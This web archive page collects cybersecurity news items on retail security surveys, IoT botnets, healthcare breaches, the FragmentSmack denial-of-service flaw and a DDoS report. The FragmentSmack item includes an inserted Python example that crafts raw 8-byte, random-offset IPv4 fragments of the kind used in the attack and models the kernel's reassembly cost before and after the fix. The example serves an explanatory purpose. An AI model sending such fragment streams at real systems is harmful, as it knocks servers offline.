DDoS Protection Specialist Archive

The majority of UK retailers are planning to increase cyber security measures during the Christmas season, a survey reveals

Retailers plan to increase cyber security measures during the holiday season, according to a poll of IT professionals in the sector in the UK, Germany, Belgium, the Netherlands, Luxembourg and the US.

Some 63% of UK and 62% of German retailers claimed to increase cyber security measures during the holiday season, according to the survey, commissioned by IT automation and security firm Infoblox.

The main reason cited for the increase by one-third of respondents in these countries was a seasonal rise in social engineering attacks, which were also identified as a dominant concern for 25% of IT professionals in the Netherlands’ retail sector.

Other kinds of attack cited were social media scams, distributed denial of service (DDoS) and ransomware.

Social media scams were of most concern in the US (19%), followed by the UK (15%), the Netherlands (14%) and Germany (12%).

DDoS attacks were of greatest concern in the Netherlands (20%), followed by Germany (17%), the UK (12%) and the US (7%).

Ransomware was of greatest concern in the US (12%), followed by Germany (11%), the UK (10%) and the Netherlands (9%).

The research found that among the main threats posed to networks within the UK were unpatched security vulnerabilities (28%), online consumers themselves (25%) and internet-connected devices (21%).

Within the UK, artificial intelligence (43%) was cited as the technology most likely to be implemented within the next year, followed by internet-connected devices (35%), portable media technology (24%), omni-channel technology (23%) and augmented reality (17%).

The majority of IT decision-makers in the UK (55%) said they were concerned about new technologies, in stark contrast to those in the Netherlands, where only 20% claimed to be concerned.

The survey also polled consumers on their experiences and attitudes towards online data privacy and security while shopping online.

Although most consumers worldwide shop online to some degree, 17% do nothing to protect their data while doing so. The UK is the most complacent, with one in five taking no proactive action to protect their data. German consumers are more cautious when shopping online: more than half (53%) shop only on secured Wi-Fi networks.

“The level of online shopping activity always increases significantly during the holiday season, and can provide rich pickings for the opportunistic cyber criminal, so it’s no coincidence that more than half of retailers will increase their cyber security spending during their most prosperous and dangerous time of year,” said Gary Cox, technology director, western Europe at Infoblox.

“It is critical that enterprises take measures to get additional network visibility, so they can respond quickly to potential cyber incidents which could result in lost revenue and brand damage.”

IT professionals in the UK named unpatched security vulnerabilities as the main source of an attack (28%), followed by consumer/end-user error (25%), vulnerabilities in the supply chain (22%), and unprotected internet-connected devices (21%).

When holiday shopping, delivery is the biggest point of concern for UK consumers (55%), followed by ID fraud (16%), data security (13%) and website crashing (13%).

Some 48% of UK consumers said they were only "somewhat" or "not at all" aware of the data being collected through store loyalty cards, and only 34% said they trusted retailers to hold their personal data.

“It is interesting that so few consumers around the world are actively concerned with the protection of their own data when shopping online, particularly when two-thirds of those we surveyed had little trust in how retailers held that data,” said Cox.

“More education is clearly required about the risks that online shoppers face, especially over Christmas, and the steps they can take to better protect their own data and identity from those intent on theft and fraud.”

Source: https://www.computerweekly.com/news/252454330/Most-UK-retailers-plan-to-up-cyber-security

For some time, threat actors who build Internet of Things-based botnets have relied on brute force attacks to take control of devices and chain them together for delivering malware or distributed denial of service attacks.

But according to a report out today from Netscout, as more secure IoT devices are installed, hackers are adding a second takeover strategy: exploiting vulnerabilities in the devices.

"In November our honeypot observed several older IoT vulnerabilities being used as a means to deliver malware," the researchers say in a blog. "Our data indicates it takes less than one day before a new IoT device is hit with exploitation attempts against known vulnerabilities."

By comparison, it can take as little as five minutes after an IoT device is connected to the internet before it is subjected to brute force login attempts using default IoT credentials. Still, vulnerability attacks can pay off because of the difficulty and slow cadence of patching IoT devices.

One factor that helps attackers is that IoT devices often sit on a distributor's shelf for a while before being sold and installed on a network, the researchers say. If a security update is released for the device in the meantime, it won't be applied until the patch team updates it, assuming it is updated at all.

As evidence, the blog notes that in November its honeypot detected a number of attempts to exploit older IoT vulnerabilities to deliver variants of the Mirai botnet to devices.

"As the rate of patching IoT devices is done at a glacial pace, these older vulnerabilities are still leveraged by IoT botnets due to their level of success," say researchers. "The continued use of these tried and true vulnerabilities highlights 'what is old is new' when it comes to IoT botnets."

Due to the sheer number of IoT devices connected to the internet, finding vulnerable devices is easy and quick. Add the large delta between when a vulnerable device is "turned on" and when security updates are applied, and attackers can quickly amass large botnets. In most cases these botnets are immediately conscripted into a DDoS army. It doesn't take a significant amount of effort to create a large IoT botnet and create havoc, as we saw with the DDoS attacks conducted by Mirai in 2016.

Source: https://www.itworldcanada.com/article/patch-new-iot-devices-fast-researchers-warn-or-theyll-be-in-a-botnet/412913

Radware’s ERT and Threat Research Center monitored an immense number of events over the last year, giving us a chance to review and analyze attack patterns to gain further insight into today’s trends and changes in the attack landscape. Here are some insights into what we have observed over the last year.

Healthcare Under Attack

Over the last decade there has been a dramatic digital transformation within healthcare; more facilities rely on electronic forms and online processes to improve and streamline the patient experience. As a result, the medical industry has new responsibilities and priorities to keep client data secure and available, which, unfortunately, are not always met.

This year, the healthcare industry dominated news with an ever-growing list of breaches and attacks. Aetna, CarePlus, Partners Healthcare, BJC Healthcare, St. Peter’s Surgery and Endoscopy Center, ATI Physical Therapy, Inogen, UnityPoint Health, Nuance Communication, LifeBridge Health, Aultman Health Foundation, Med Associates and more recently Nashville Metro Public Health, UMC Physicians, and LabCorp Diagnostics have all disclosed or settled major breaches.

Generally speaking, the risk of falling prey to data breaches is high, due to password sharing, outdated and unpatched software, or exposed and vulnerable servers. In medical facilities in particular, other risks appear, such as the number of hospital employees who have full or partial access to your health records during your stay. The potential for a malicious insider or abuse of access is also very high, as is the risk of third-party breaches. For example, it was recently disclosed that NHS patient records may have been exposed when passwords were stolen from Embrace Learning, a training business used by healthcare workers to learn about data protection.

Profiting From Medical Data

These recent cyber-attacks targeting the healthcare industry underscore the growing threat to hospitals, medical institutions and insurance companies around the world. So, what’s driving the trend? Profit. Personal data, specifically healthcare records, are in demand and quite valuable on today’s black market, often fetching more money per record than your financial records, and are a crucial part of today’s Fullz packages sold by cyber criminals.

Not only are criminals exfiltrating patient data and selling it for a profit; others have opted to encrypt medical records with ransomware or hold the data hostage until their extortion demand is met. Hospitals are often quick to pay an extortionist because backups are non-existent or restoring services would take too long. Because of this, cyber-criminals focus on this industry.

Most of the attacks targeting the medical industry are ransomware attacks, often delivered via phishing campaigns. There have also been cases where ransomware and malware were delivered via drive-by downloads and compromised third-party vendors. We have also seen criminals use SQL injection to steal data from medical applications and flood those networks with DDoS attacks. More recently, we have seen large-scale scanning and exploitation of internet-connected devices for the purpose of crypto mining, some of them located inside medical networks. In addition to causing outages and encrypting data, these attacks have resulted in cancelled elective cases, diverted incoming patients and rescheduled surgeries.

For-profit hackers launch a number of different attacks against medical networks designed to steal your personal information from vulnerable or exposed databases. They look for a complete or partial set of information such as name, date of birth, Social Security number, diagnosis or treatment information, Medicare or Medicaid identification number, medical record number, billing/claims information, health insurance information, disability code, birth or marriage certificate information, Employer Identification Number, driver's license number, passport information, banking or financial account numbers, and usernames and passwords, so they can resell that information for a profit.

Sometimes the data obtained by the criminal is incomplete, but that data can be leveraged as a stepping stone to gather additional information. Criminals can use partial information to create a spear-phishing kit designed to gain your trust by citing a piece of personal information as bait. And they’ll move very quickly once they gain access to PHI or payment information. Criminals will normally sell the information obtained, even if incomplete, in bulk or in packages on private forums to other criminals who have the ability to complete the Fullz package or quickly cash the accounts out. Stolen data will also find its way to public auctions and marketplaces on the dark net, where sellers try to get the highest price possible for data or gain attention and notoriety for the hack.

Don’t let healthcare data slip through the cracks; be prepared.

Source: https://securityboulevard.com/2018/12/2018-in-review-healthcare-under-attack/

FragmentSmack, a DDoS vulnerability first discovered in Linux, affects Windows as well as nearly 90 Cisco products. Discover how it can be exploited with Judith Myerson.

A distributed denial-of-service vulnerability called FragmentSmack enables an unauthenticated remote attacker to disable servers with a stream of fragmented IP packets that trigger the vulnerability on affected systems. First discovered in Linux, and now also found in Windows, FragmentSmack affects many products, including nearly 90 from Cisco. How can this vulnerability be exploited, and how big is the threat?

FragmentSmack (tracked as CVE-2018-5391) is a vulnerability in the IP stack that can be used to execute a distributed denial-of-service attack. The vulnerability affects Linux kernel version 3.9 or later, and it was discovered in some Cisco products by the Vulnerability Coordination team of the National Cyber Security Centre of Finland and the CERT Coordination Center. The flaw is caused by inefficient algorithms used in IP implementations to reassemble fragmented IPv4 and IPv6 packets.

An attacker using the FragmentSmack vulnerability could exploit it remotely by continuously sending crafted packets — that appear to be fragments of larger packets that need to be reassembled — to cause the system to become unresponsive, as 100% of the CPU cores will be in use.

In one scenario, an attacker sends a stream of 8-byte IP fragments, each carrying a randomly chosen fragment offset, to a server. Because the fragments never add up to a complete datagram, reassembly never happens and they accumulate in the reassembly queue. The kernel walks that queue for every newly arrived fragment to find its insertion point, so the work per packet grows with the queue length until all CPU core resources are consumed, leaving no room for other tasks the system needs to perform.

The attacker doesn't choose which core handles the malformed packets; the Linux kernel automatically distributes the reassembly work across cores. While such an attack could take a server down, once the flow of malicious fragments stops, the targeted server resumes its normal function.
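To make the cost of that queue walk concrete, here is an added example (not code from the article, the Linux kernel or any vendor). It builds raw IPv4 headers for the 8-byte, random-offset fragment stream described above, then replays the offsets through two queue models: a sorted list walked from the head on every insert, which is how the pre-fix kernel's reassembly queue behaved, and a binary-search insert standing in for the rb-tree the fix introduced. The source and destination addresses, the IP identification value and the seed are assumptions; nothing is sent on the wire.

```python
"""FragmentSmack (CVE-2018-5391) reassembly-cost model. Added example only."""
import random
import struct

IP_MF = 0x2000        # "more fragments" flag in the flags/offset field
OFFSET_MASK = 0x1FFF  # 13-bit fragment offset, in units of 8 bytes


def _checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum over the 20-byte IPv4 header."""
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def ipv4_fragment(src: bytes, dst: bytes, ident: int, offset_units: int,
                  more: bool, payload: bytes) -> bytes:
    """Header + payload for one fragment of datagram `ident`. An 8-byte payload
    is the smallest non-final fragment the offset granularity allows."""
    if not 0 <= offset_units <= OFFSET_MASK:
        raise ValueError("offset does not fit in 13 bits")
    flags_off = (IP_MF if more else 0) | offset_units
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), ident,
                      flags_off, 64, 17, 0, src, dst)  # TTL 64, proto UDP
    hdr = hdr[:10] + struct.pack("!H", _checksum(hdr)) + hdr[12:]
    return hdr + payload


def parse_fragment(frag: bytes):
    """Return (ident, offset_units, more_fragments) from a raw fragment."""
    ident, flags_off = struct.unpack("!HH", frag[4:8])
    return ident, flags_off & OFFSET_MASK, bool(flags_off & IP_MF)


def attack_stream(count: int, seed: int = 7) -> list:
    """Constructed sample input: `count` 8-byte fragments of one datagram at
    random offsets, MF always set, so reassembly can never complete."""
    rng = random.Random(seed)
    src, dst = bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2])  # assumed addresses
    return [ipv4_fragment(src, dst, 0x1234, rng.randrange(1, OFFSET_MASK + 1),
                          True, b"\x00" * 8) for _ in range(count)]


class ListQueue:
    """Pre-fix model: fragments kept in ascending offset order. An in-order
    fragment is appended at the tail; anything else forces a walk from the
    head, one step per node visited, until the insertion point is found."""
    def __init__(self):
        self.offsets, self.steps = [], 0

    def insert(self, off: int) -> None:
        if not self.offsets or self.offsets[-1] < off:  # tail fast path
            self.offsets.append(off)
            return
        i = 0
        while True:
            self.steps += 1
            if self.offsets[i] >= off:  # first node at or after `off`
                break
            i += 1
        self.offsets.insert(i, off)


class TreeQueue:
    """Post-fix model: the rb-tree finds the slot in O(log n) compares. A
    binary search over a sorted list stands in for the tree here."""
    def __init__(self):
        self.offsets, self.steps = [], 0

    def insert(self, off: int) -> None:
        lo, hi = 0, len(self.offsets)
        while lo < hi:
            mid = (lo + hi) // 2
            self.steps += 1
            if self.offsets[mid] < off:
                lo = mid + 1
            else:
                hi = mid
        self.offsets.insert(lo, off)


def replay(frags: list, queue) -> int:
    """Feed a fragment stream to a queue model; return the total step count."""
    for frag in frags:
        _, off, _ = parse_fragment(frag)
        queue.insert(off)
    return queue.steps


def compare(count: int) -> dict:
    """Steps both models spend on the same `count`-fragment attack stream."""
    frags = attack_stream(count)
    return {"fragments": count,
            "list_steps": replay(frags, ListQueue()),
            "tree_steps": replay(frags, TreeQueue())}


if __name__ == "__main__":
    for n in (500, 1000, 2000):
        print(compare(n))
```

Doubling the stream roughly quadruples the list model's steps while the tree model grows only slightly faster than linearly, which is the asymmetry the attack exploits: the sender spends one 28-byte packet per fragment and the receiver spends a queue walk. The kernel fix (Linux 4.19, backported to vendor kernels) replaced the list with an rb-tree; the interim vendor mitigation was to lower net.ipv4.ipfrag_high_thresh and net.ipv4.ipfrag_low_thresh so the queue could not grow large enough for the walk to matter.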

Cisco's listed vulnerable products include network and content security devices, voice and unified communications devices, and telepresence and transcoding devices.

Likewise, this threat extends to Microsoft and Red Hat. The affected Windows versions are 7, 8.1 and 10, as well as all Windows Server versions. Windows 10 64-bit in particular offers an optional Windows Subsystem for Linux that is vulnerable; turning off this option does not prevent an attacker from exploiting the vulnerability, however.

Vulnerable Red Hat products include Virtualization 4, Enterprise MRG, Enterprise Linux Atomic Host and Enterprise Linux versions 6, 7, Real Time 7, 7 for ARM64 and 7 for Power.

Source: https://searchsecurity.techtarget.com/answer/FragmentSmack-How-is-this-denial-of-service-exploited

The website of the people’s militia department of the self-proclaimed Donetsk people’s republic was subjected to DDoS attacks, said the head of the people’s militia press service, Daniel Bezsonov.

According to him, this happened after the agency announced that Kiev was preparing a large-scale offensive in the Donbass.

"It has been established that the attack was carried out from Ukrainian and Baltic IP addresses," Bezsonov said, as quoted by the Donetsk News Agency.

In October 2016, the DPR announced that hackers from Ukraine had hacked and blocked the database of the self-proclaimed Donetsk People’s Republic pension fund, as a result of which payments to DPR residents were suspended.

Source: http://www.tellerreport.com/news/–in-the-dni-reported-on-ddos-attack-on-the-site-of-the-national-police-.BkyHtk6JE.html